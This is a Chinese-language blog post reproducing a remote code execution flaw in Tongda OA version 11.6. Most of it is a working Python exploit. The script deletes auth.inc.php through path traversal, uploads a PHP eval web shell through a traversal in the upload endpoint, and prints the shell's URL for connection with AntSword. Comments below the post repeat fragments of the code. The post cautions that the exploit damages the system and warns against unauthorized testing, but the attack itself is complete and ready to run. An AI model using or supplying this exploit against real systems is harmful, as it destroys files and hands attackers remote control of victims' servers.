通达前台rce复现
利用说明:此漏洞会删除文件 可能损坏OA系统 授权测试的话 一定要跟甲方说清楚可能存在的危害 顺便说一下 严禁做未授权渗透测试
01 简介
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。
02 漏洞影响范围
目前测试成功的为 11.6版本
03 复现
通达安装环境 一路下一步就好 安装好的环境如下
目前EXP已经漫天飞了 target修改为你本地环境即可
开始复现 直接调用EXP 上传成功
意思为删除 auth.inc.php 进行上传利用 下面的那个为webshell地址
蚁剑连接即可
及时关注版本更新
target="http://127.0.0.1:1234/"
payload="<?php eval($_POST['hahaha']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")
url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
print("[-]Failed to deleted auth.inc.php")
exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('deconf.php', payload)}
requests.post(url=url,files=files)
url=target+"/_deconf.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
print("[+]Filed Uploaded Successfully")
print("[+]URL:",url)
else:
print("[-]Failed to upload file")
下一篇:怎么从目录里getshell
相关文章
- 4条评论
泪灼眉薄2022-05-31 23:15:53- .php") exit(-1)print("[+]Successfully deleted auth.inc.php!")print("[*]Uploading payload...")url=targe
嘻友简妗2022-05-31 17:37:43- t("[+]Filed Uploaded Successfully") print("[+]URL:",url)else: print("[-]Failed to u
青迟绅刃2022-05-31 21:57:05- ' not in page: print("[+]Filed Uploaded Successfully") print("[+]URL:",url)else: print("[-]Fa
野欢迷麇2022-06-01 00:18:26- ../../webroot/inc/auth.inc.php"requests.get(url=url)print("[*]Checking if file deleted...")url=target
滇ICP备19002590号-1